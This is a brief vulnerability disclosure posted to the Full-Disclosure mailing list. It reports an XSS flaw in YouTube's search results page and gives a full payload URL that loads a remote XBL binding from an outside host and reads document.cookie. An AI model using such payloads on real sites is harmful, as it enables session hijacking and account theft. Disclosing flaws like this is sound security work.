XSS in YouTube.com

["Michal Majchrowicz" <m.majchrowicz () gmail com>]

I discovered it just while waiting for my video to download :)
http://youtube.com/results?search_query=test+'test%22%%20style=-moz-binding:url('http://sectroyer.110mb.com/xss.xml%23xss')%20style=background:url(javascript:alert(document.cookie))%20test=test
Besides stealing YouTube accounts I don't think it can be used for
something serious.
Just post it here in case anyone is interested.
Regards Michal.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/